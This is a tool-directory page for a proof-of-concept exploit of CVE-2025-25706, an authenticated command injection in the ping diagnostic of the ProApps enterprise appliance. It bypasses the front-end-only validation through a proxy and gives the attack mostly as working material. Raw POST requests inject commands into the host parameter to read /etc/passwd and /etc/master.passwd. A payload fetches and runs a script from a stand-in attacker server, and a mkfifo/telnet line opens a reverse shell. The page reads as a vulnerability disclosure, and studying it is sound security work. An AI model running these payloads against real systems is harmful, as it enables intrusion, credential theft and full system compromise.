Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-25706 — Detailed CVE-2025-25706 proof-of-concept demonstrating authenticated remote code execution via command injection in ProApps ping functionality, including reverse shell payload and exploitation steps. | Kitploit
Tools/GitHubGitHub/cotherm/cve-2025-25706
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubcotherm/cve-2025-25706

CVE-2025-25706

Detailed CVE-2025-25706 proof-of-concept demonstrating authenticated remote code execution via command injection in ProApps ping functionality, including reverse shell payload and exploitation steps.

View Repository
21 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-25706

Description Item:

root@kitploit:~
Product Vendor: freebsdbrasil
Item: ProApps - Enterprise Appliance
Editor Creator: DreamWeaver
PHP: PHP Version 7.3.18 
Java Script Library: Jquery UI 1.6 | Jquery 1.2.6
Server: NGINX
Operational System: FreeBDS Unix

Vulnerability Type:

Remote Code Execution

Description Vulnerability:

The vulnerability occurs because a user can inject system commands through the application using the ping functionality by adding a sequence command operator in Unix environments, such as (;, &&, or |). To exploit the vulnerability it's necessary to be authenticated. The user must belong to a permission group called 'Status' and have 'Modified' Permission. It is also important to mention that successful exploitation requires bypassing input sanitization. The application validates user input only on the front end, making it necessary to send the request through a network proxy, for example. In this way the limitations imposed by the application to be bypassed."

Exploitation:

After authentication, it will be necessary to access a page called sta_rede.diagnostico_ping (http(s)://vulnerablepage.index.php?page=sta_rede.diagnostico_ping&task=view). This page provides a function to perform an ICMP request to an arbitrary host. To learn more about the ping utility and the ICMP protocol (Request and Reply), please refer to the RFC mentioned in the references section.

The application sends a POST request with the parameters host, testar_pacote, and ttl, where host is the target of the ping, testar_pacote specifies the number of ICMP requests to send, and TTL is time to Live (TTL) for the packets. Upon send the request the application executes the following command on the Unix system: ping -c $testar_pacote $host. Below is the POST request demonstrating the functionality:

root@kitploit:~
POST /include/sta/rede.diagnostico_ping.ajax.php HTTP/1.1
Host: vulnerablewebsite.com
Cookie: PHPSESSID=6457d273b50b3bbaea19cbb4500d6577
Content-Length: 66
Authorization: XXXXXXX
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Origin: https://vulnerablewebsite.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerablewebsite.com/index.php?page=sta_rede.diagnostico_ping&task=view
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

page=sta_rede.diagnostico_ping&host=8.8.8.8&testar_pacote=1&ttl=64

This is where an attack vector is noticed. A user can exploit the vulnerability by sending a malicious POST request through a network proxy to bypass input sanitization by appending one of the sequence command operators (;, &&, or |) to the host parameter, the web application will execute the ping command mentioned above, followed by an additional command. For example, this could include reading sensitive files like /etc/passwd, /etc/master.passwd or get a reverse shell or execute arbitrary commands.

The POST request below is a crafted and malicious example:

root@kitploit:~
POST /include/sta/rede.diagnostico_ping.ajax.php HTTP/1.1
Host: vulnerablewebsite.com
Cookie: PHPSESSID=6457d273b50b3bbaea19cbb4500d6577
Content-Length: 66
Authorization: XXXXXXX
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Origin: https://vulnerablewebsite.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerablewebsite.com/index.php?page=sta_rede.diagnostico_ping&task=view
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

page=sta_rede.diagnostico_ping&host=8.8.8.8; cat /etc/passwd;cat /etc/master.passwd&testar_pacote=1&ttl=64

Reverse Shell POC:

HTTP POST Request to sta_rede.diagnostico_ping: page=sta_rede.diagnostico_ping&host=x.x.x.x;curl -O http://attackserver/maliciousfile.sh; chmod +x maliciousfile.sh; ./maliciousfile.sh&testar_pacote=1&ttl=64

Maicious file content:

TF=$(mktemp -u);mkfifo $TF && telnet $attacker.ip $attacker.port 0<$TF | sh 1>$TF

By listening on the specified port with Netcat, a reverse shell is successfully opened.

Impact Vulnerability:

RCE (Remote Code Execution) vulnerabilities allow an attacker to execute arbitrary code on a remote device, it can lead in a Full System Compromise, Data Breach, Lateral Movement, Malware Deployment and Reputational and Financial Damage.

References:

  • https://www.rfc-editor.org/rfc/rfc777
  • https://www.checkpoint.com/cyber-hub/cyber-security/what-is-remote-code-execution-rce/
Download Tool